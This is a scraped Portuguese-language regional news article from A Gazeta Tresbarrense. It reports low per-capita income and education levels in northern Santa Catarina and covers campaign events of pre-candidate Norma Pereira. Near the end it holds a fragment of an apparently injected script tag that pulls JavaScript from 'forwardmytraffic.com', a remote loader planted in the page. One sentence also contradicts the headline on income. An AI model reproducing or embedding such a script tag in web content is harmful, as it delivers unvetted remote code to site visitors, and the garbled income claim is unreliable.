InícioDestaqueRenda per capita do norte catarinense é menor do que média nacional

Renda per capita do norte catarinense é menor do que média nacional

Últimas notícias

Guerra Mundial: entenda riscos de conflito entre Israel e Irã

O risco de uma nova guerra mundial existe caso...

Parada 120 – Hamburgueria artesanal em Três Barras

Conheça o melhor delivery de hambúrgueres artesanais de Três...

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

 

Através de pesquisas realizadas pela Amplanorte, a renda per capita do Norte Catarinense é a media Brasileira.  Os números também mostraram que em relação ao grau de instrução, que no Planalto Norte somente 6% da população tem nível superior completo, sendo a educação um dos maiores problemas da região. (Fonte: adaptado de PNUD 2010).

 

Na Reunião do Sindimadeira, a vereadora e Pré-Candidata a Deputada Federal, Norma Pereira (PSDB), destacou a importância de ter um representante na Câmara dos Deputados, para trazer recursos para a educação, desenvolvimento e infraestrutura.

 

Em visita a Ervateira Yacuy, o Sr. Niceto Fuck apresentou a fábrica, e Norma Pereira, teve a oportunidade de interagir com os funcionários contando sua trajetória política. “Sem representatividade, de uma Deputada Federal, a Região só está perdendo com isso. Quantas emendas parlamentares podem ser criadas para trazer recursos para o Planalto Norte”, destacou. Cabe ao deputado federal a criação, revisão e revogação das leis federais. São os deputados federais também os políticos que avaliam e votam as medidas provisórias assinados pela presidência da república. “É na Câmara que são aprovados as despesas e arrecadações previstas para o ano inteiro”, contou.

 

Durante o final de semana A Pré-Candidata, esteve presente na Festa Julina da Escola de Educação Básica João José de Souza Cabral e da Escola Professor Manoel da Silva Quadros, além de prestigiar a Festa na Serra do Lucindo, onde se reuniu com autoridades locais. “Estou muito feliz com apoio e o carinho das pessoas comigo, isso é muito importante, trazendo força e determinação para continuar essa trajetória”, falou.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.